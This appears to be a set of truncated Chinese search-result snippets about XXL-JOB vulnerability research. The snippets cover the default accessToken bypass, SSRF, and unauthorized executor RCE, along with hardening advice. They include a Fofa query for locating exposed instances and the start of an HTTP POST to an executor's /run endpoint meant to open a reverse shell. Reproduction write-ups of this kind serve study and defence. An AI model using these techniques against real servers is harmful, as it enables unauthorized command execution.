及时升级:定期关注XXL-JOB的更新动态,及时升级到最新版本,以修复已知漏洞。 加强密码管理:设置强密码策略,定期更换密码,并避免使用默认密码。 配置认证机制:确保executor端配置了适当的认证机制,如使用accessToken进行访问控制。 限制网络访问:配置网络访问控制策略,限制对外请求的范围,防止SSRF等漏洞被利用。 安全审计:定...
调度中心(默认端口 8080)就是 xxl-job-admin,而执行器(默认端口 9999)则就是所谓的 executor。执行器接收调度中心发出的命令,在所在机器上执行后并返回结果。而接收上级指令一定有一个身份验证来保证不被滥用,这个验证就是 accessToken。那么现在我们大致就理清漏洞的利用思路了,很简单就是构造一个调度中心的指...
对于xxl-job,SSRF漏洞可以实现如下目的: 获取accessToken: 对于没有使用默认accessToken的调度服务,可以利用该漏洞获取accessToken。 利用accessToken攻击executor机器:比如远程命令执行,包括shell反弹获取机器操作权限。 三、漏洞利用 1.控制台搜索 对于Fofa网络空间引擎: 代码语言:javascript 复制 app="XXL-JOB"||title=...
漏洞实战(2):XXL-JOB默认密钥漏洞 1、原理 XXL-JOB[1]是一个分布式任务调度平台,分为调度中心和执行器两部分。 在最新的两个版本中(2022年5月21日发布的2.3.1版本、2023年5月23日发布的2.4.0版本),XXL-JOB默认启用accessToken,在调度中心与执行器之间进行调度通讯时,用于证明自己的身份。 accessToken的默认值...
XXL-job任务调度平台若干漏洞研究 一、XXL-job简介 在平时的业务场景中,经常有一些场景需要使用定时任务,比如: 某个时间点发送优惠券 发送短信等等 批量处理数据:批量统计上个月的账单,统计上个月销售数据等等 固定频率的场景:每隔5分钟需要执行一次 定时任务在业务场景中非常常见,而且对于现在快速消费的时代,每天都...
但是不影响漏洞利用,物理机中直接调用 executor 执行器客户端/run接口,传递如下 glueSource 参数,反弹 Shell: POST/runHTTP/1.1Host:192.168.0.122:9999Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/120.0.0.0Safari/537.36Accept:text/html...
xxl-job的executeor存在未授权访问漏洞,指纹如下图所示 低版本 高版本 其原因就是admin端与executeor端通过互相发送tcp包进行通信,攻击者可伪造包,使executeor执行命令。 该漏洞主要分为三个阶段 1、XxlJob<2.1.2,需要利用Hessian触发。 参考这个项目即可RCE ...
这也是实战中遇到的一个案例,目标单位存在一个nacos的身份伪造漏洞,获取到了数据库的配置文件,成功的连上了数据库,当然我们可以去尝试udf提权或者猜目录去写马,但我发现数据库中存在xxl_job的数据库,这时候其实就有更多的方法去getshell。 这时候通常有两种利用方式: ...
昨天看见微步发布XXL-JOB默认accessToken身份绕过漏洞,之前hw期间遇到过几次,都没弱口令和未授权,对其有点印象,遂复现一下。 漏洞影响:2.3.1和2.4 环境准备: 1、下载即可:https://github.com/xuxueli/xxl-job/releases/tag/2.4.0 将其导入IDEA中,即可进行分析。环境要求:Maven3+、Jdk1.8+、Mysql5.7+ ...
从代码设定来看,如果漏洞利用者使用到这些XXL-JOB为了灵活支持多语言以及脚本任务,可以进行无差别使用。从代码支撑的语言可以看出来,支持Java、Shell、Python、NodeJS、PHP、PowerShell……等(动态生效:用户在线通过WebIDE开发的任务代码,远程推送至执行器,实时加载执行)类型。任务以源码方式维护在调度中心,支持通过Web ID...